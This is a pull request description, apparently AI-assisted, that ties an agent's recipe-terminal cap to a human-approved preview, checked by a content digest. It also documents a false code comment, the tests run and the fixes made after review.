Rather than just raising the constant or making it configurable, this takes the direction the maintainer suggested on the issue (option 3): let an approver authorize the whole recipe. A new `HostApprovedRecipeRun` (`recipeId`, `terminalCount`, `terminalsDigest`) is modeled directly on the existing `hostApprovedTargets` mechanism from #12123. It's captured in `useMcpBridge` from the same resolved recipe object the confirmation dialog already builds its preview lines from, stamped onto `ActionContext` by `ActionService.dispatch` (so a caller-supplied `contextOverride` can't forge or plant one), and deliberately left out of every action's `argsSchema`, so a model driving the agent can't just name its own approval and grant itself one.

Resolves #12263

## Changes

There are three outcomes at the cap now, not two:

- **No approval captured** (an unattended call, or one pre-authorized by a standing automation grant that never actually showed anyone a preview) falls back to `MAX_AGENT_RECIPE_TERMINALS`, same as before.
- **An approval exists and still matches the recipe about to run** uses the count the dialog originally showed the human, not the old constant.
- **An approval exists but no longer matches** starts zero terminals, not three. Falling back to 3 here would fail in the dangerous direction: a human approves a preview of a one-terminal recipe, then before the run executes the same recipe id gets reloaded and now resolves to a completely different ten-terminal recipe nobody saw. Silently starting three terminals in that case means starting three terminals nobody approved.

`terminalsDigest` closes a same-id content-drift window that turned out to be real, not theoretical: in-repo recipes reload on window focus, which is exactly when someone alt-tabs back to click Approve, and composite recipes wait on a worktree being created before the recipe actually runs. Same id, same count, different commands was a live window, and the digest catches it.

Also in scope: `worktree.createWithRecipe` and `workflow.startWorkOnIssue` now forward the same approval, otherwise they'd preview a certain number of terminals and then refuse to start that many, the same bug class as #10110. And since the offer and the run are now always the same size, the preview UI's old capped framing and its struck-through "not started" marker for excess terminals are gone.

Along the way I found a false comment at `recipeStore.ts:988` claiming a capped agent run "can never reach the confirmation-dialog path." Not true: `preflightSpawnBatchLimit` prompts for confirmation whenever the current terminal count plus the terminals about to be allowed exceeds `DEFAULT_CONFIRMATION_LIMIT` (20), and that current count is the workspace's total ambient open panel count, which no per-recipe cap bounds. 18 already-open panels plus a capped batch of 3 is 21, over the limit, and it does prompt, contradicting the old comment. I replaced the comment and added a regression test that pins down the real behavior so the next reader gets the facts instead of the old claim. I did not fix that defect itself, only documented and pinned it, since it's a separate bug and deserves its own issue. Flagging it here so it doesn't get lost.

`terminalIndices` on `recipe.run`'s `argsSchema` stays out of scope, per both the original issue and my own earlier call.

## Testing

682 targeted tests pass across `recipeApprovalDigest`, `recipeStore`, `useMcpBridge`, `recipeConfirmPreview`, `ActionService`, the `recipeActions` and `workflowActions` adversarial suites, `actionDefinitions.quality`, `mcpExternalBaseManifest`, `mcpWireBudget`, `effectiveDanger`, and `panelLimitStore`. Both `check:confirm-wiring` and `lint:ratchet` exit 0. Prettier and eslint are clean on all changed files. The MCP base manifest and the action-definitions snapshot were regenerated, not hand-edited. The `recipe.run` description was rewritten to describe the new behavior and came out to 379 bytes, two bytes under its previous size, so no description budget moved.

This was reviewed by Codex across three passes (correctness/security, tests, and a confirmation-flow pass). It found three real defects in the first version: an over-grant when the approval no longer matched the recipe, the content-drift window around a reused recipe id, and an unvalidated terminal count. All three are fixed in the follow-up commits.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01MfSjJdLr4z4rPqkLM3bjmr